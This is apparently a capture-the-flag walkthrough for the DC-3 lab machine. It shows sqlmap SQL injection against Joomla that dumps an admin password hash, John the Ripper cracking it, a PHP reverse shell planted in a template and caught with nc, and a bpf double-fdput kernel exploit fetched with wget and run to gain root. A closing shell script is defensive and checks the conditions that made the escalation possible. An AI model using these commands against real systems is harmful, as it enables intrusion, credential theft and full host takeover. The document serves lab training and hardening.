./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables -D joomladb

Database: joomladb
[76 tables]
+------------------------------------------------------+
| #__assets                                            |
| #__associations                                      |
| #__banner_clients                                    |
| #__banner_tracks                                     |
| #__banners                                           |
| #__bsms_admin                                        |
| #__bsms_books                                        |
| #__bsms_comments                                     |
| #__bsms_locations                                    |
| #__bsms_mediafiles                                   |
| #__bsms_message_typ                                  |
| #__bsms_podcast                                      |
| #__bsms_series                                       |
| #__bsms_servers                                      |
| #__bsms_studies                                      |
| #__bsms_studytopics                                  |
| #__bsms_teachers                                     |
| #__bsms_templatecod                                  |
| #__bsms_templates                                    |
| #__bsms_timeset                                      |
| #__bsms_topics                                       |
| #__bsms_update                                       |
| #__categories                                        |
| #__contact_details                                   |
| #__content_frontpag                                  |
| #__content_rating                                    |
| #__content_types                                     |
| #__content                                           |
| #__contentitem_tag_                                  |
| #__core_log_searche                                  |
| #__extensions                                        |
| #__fields_categorie                                  |
| #__fields_groups                                     |
| #__fields_values                                     |
| #__fields                                            |
| #__finder_filters                                    |
| #__finder_links_ter                                  |
| #__finder_links                                      |
| #__finder_taxonomy_                                  |
| #__finder_taxonomy                                   |
| #__finder_terms_com                                  |
| #__finder_terms                                      |
| #__finder_tokens_ag                                  |
| #__finder_tokens                                     |
| #__finder_types                                      |
| #__jbsbackup_timese                                  |
| #__jbspodcast_times                                  |
| #__languages                                         |
| #__menu_types                                        |
| #__menu                                              |
| #__messages_cfg                                      |
| #__messages                                          |
| #__modules_menu                                      |
| #__modules                                           |
| #__newsfeeds                                         |
| #__overrider                                         |
| #__postinstall_mess                                  |
| #__redirect_links                                    |
| #__schemas                                           |
| #__session                                           |
| #__tags                                              |
| #__template_styles                                   |
| #__ucm_base                                          |
| #__ucm_content                                       |
| #__ucm_history                                       |
| #__update_sites_ext                                  |
| #__update_sites                                      |
| #__updates                                           |
| #__user_keys                                         |
| #__user_notes                                        |
| #__user_profiles                                     |
| #__user_usergroup_m                                  |
| #__usergroups                                        |
| #__users                                             |
| #__utf8_conversion                                   |
| #__viewlevels                                        |
+------------------------------------------------------+

We got back 76 tables, but the one we are interested in is the '#__users' table. Next we extract its columns from the remote host.

./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns -D joomladb -T "#_users"

We get three columns from the users table, email, username and password, for the admin of the site:

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Our next task is to fire up John the Ripper and crack the hash we got from the database.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/joomla.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (admin)
1g 0:00:00:03 DONE (2019-11-01 14:16) 0.3311g/s 47.68p/s 47.68c/s 47.68C/s mylove..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

Now we can log in to the admin interface of the Joomla site.

Just like in WordPress, an admin can edit the PHP files in the templates folder. We do that and add our reverse-shell PHP code to the index.php file of the template.

Once we have saved the PHP file it's time to click the 'Template Preview' button to execute our reverse-shell code. The preview function in the Joomla CMS runs the template, and we get a connection back to our Kali box:

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39464
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 06:23:02 up  1:00,  0 users,  load average: 0.00, 0.04, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/$ 

We upgrade the shell and go off searching.

www-data@DC-3:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
www-data@DC-3:/var/www/html$ 

We see there is one regular user on the system, 'dc3'; other than that there is nothing interesting in the passwd file.

www-data@DC-3:/var/www/html$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/tmp/ebpf_mapfd_doubleput_exploit/suidhelper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/at
www-data@DC-3:/var/www/html$ 

We search for SUID binaries on the system but find nothing that could help us escalate our privileges, so we move on to the kernel version, looking for a kernel exploit.

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html$ 

www-data@DC-3:/var/www/html$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@DC-3:/var/www/html$ 

The kernel version is 4.4.0-21 on Ubuntu 16.04 LTS. Let's fire up searchsploit and look for possible exploits for this version of Linux.

root@ubuntu:~/src/exploitdb# ./searchsploit ubuntu 16.04
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                                                    | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                                       | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download                | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                                                           | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Loc | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                                                               | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read                                           | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                     | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                                                  | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                    | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                               | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                      | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                        | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                                              | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                                                                          | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                       | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                              | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                   | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                               | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)           | exploits/linux/local/47169.c
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

One entry looks promising: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation (exploits/linux/local/39772.txt). We download the exploit archive to the target and try to compile it there.

www-data@DC-3:/tmp$ wget http://192.168.56.1/~sam/exploit.tar
wget http://192.168.56.1/~sam/exploit.tar
--2019-11-02 06:52:42--  http://192.168.56.1/~sam/exploit.tar
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'

exploit.tar         100%[===================>]  20.00K  --.-KB/s    in 0s      

2019-11-02 06:52:42 (134 MB/s) - 'exploit.tar' saved [20480/20480]

www-data@DC-3:/tmp$ ls
ls
exploit.tar
systemd-private-268ff12d81824fca955ee00cf8f2944e-systemd-timesyncd.service-6lcYCc
www-data@DC-3:/tmp$

We need to extract the archive before we can compile. After that, all that's left is to run compile.sh and hope the build succeeds.

www-data@DC-3:/tmp$ tar xvf exploit.tar
tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26  2016 .
drwxrwxrwt 9 root     root     4096 Nov  2 06:53 ..
-rwxr-x--- 1 www-data www-data  155 Apr 26  2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26  2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26  2016 hello.c
-rw-r----- 1 www-data www-data  255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$

The two pointer-cast warnings are only warnings and the build produced a doubleput binary. We make it executable and run it.

www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput
chmod +x doubleput
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# 

We got root! Changing to /root, we find the one and only flag.

root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls -la
ls -la
total 32
drwx------  2 root root 4096 Mar 26  2019 .
drwxr-xr-x 22 root root 4096 Mar 23  2019 ..
-rw-------  1 root root   67 Mar 26  2019 .bash_history
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-------  1 root root   71 Mar 23  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-------  1 root root 2889 Mar 26  2019 .viminfo
-rw-r--r--  1 root root  604 Mar 26  2019 the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root# 
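The escalation above needed three things from the host: an unprivileged user allowed to call bpf(), an executable /tmp to build and run from, and a kernel missing the fix. The script below is an added hardening check, not part of the original walkthrough; each check takes its input as a parameter so it can also be run against captured data, and the patched kernel version is a placeholder argument taken from the vendor advisory, not a number from this page.

```shell
#!/bin/sh
# Added hardening check (not from the DC-3 walkthrough): tests the conditions
# the bpf double-fdput escalation depended on. Usage: sh checks.sh <patched-version>

# 1. Unprivileged bpf(). doubleput loaded a BPF program as www-data; with
#    kernel.unprivileged_bpf_disabled=1 (sysctl present since Linux 4.4) the
#    bpf() syscall is refused for callers without CAP_SYS_ADMIN.
#    $1: path to the sysctl file; returns 0 when the mitigation is on.
bpf_locked_down() {
  f="${1:-/proc/sys/kernel/unprivileged_bpf_disabled}"
  [ -r "$f" ] && [ "$(cat "$f")" != "0" ]
}

# 2. Executable /tmp. The exploit was compiled in and run from /tmp; a noexec
#    mount would have stopped ./doubleput from executing.
#    $1: text in /proc/mounts format; returns 0 when /tmp carries noexec.
tmp_is_noexec() {
  printf '%s\n' "$1" |
    awk '$2 == "/tmp" && $4 ~ /(^|,)noexec(,|$)/ { found = 1 } END { exit !found }'
}

# 3. Kernel patch level. Returns 0 when version $1 sorts below $2, comparing
#    numeric fields split on '.' and '-' (so 4.4.0-21-generic < 4.4.0-22).
#    The fixed version must come from the vendor advisory for the CVE.
kernel_older_than() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, /[.-]/); m = split(b, y, /[.-]/)
    k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      if (x[i] + 0 < y[i] + 0) exit 0
      if (x[i] + 0 > y[i] + 0) exit 1
    }
    exit 1
  }'
}

# Runs all three checks against the live host; $1 is the patched version.
run_checks() {
  bpf_locked_down && echo "OK   unprivileged bpf() disabled" || echo "WARN unprivileged bpf() allowed"
  tmp_is_noexec "$(cat /proc/mounts)" && echo "OK   /tmp is noexec" || echo "WARN /tmp allows execution"
  kernel_older_than "$(uname -r)" "$1" && echo "WARN kernel $(uname -r) below $1" || echo "OK   kernel at or above $1"
}

if [ $# -ge 1 ]; then run_checks "$1"; fi
```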
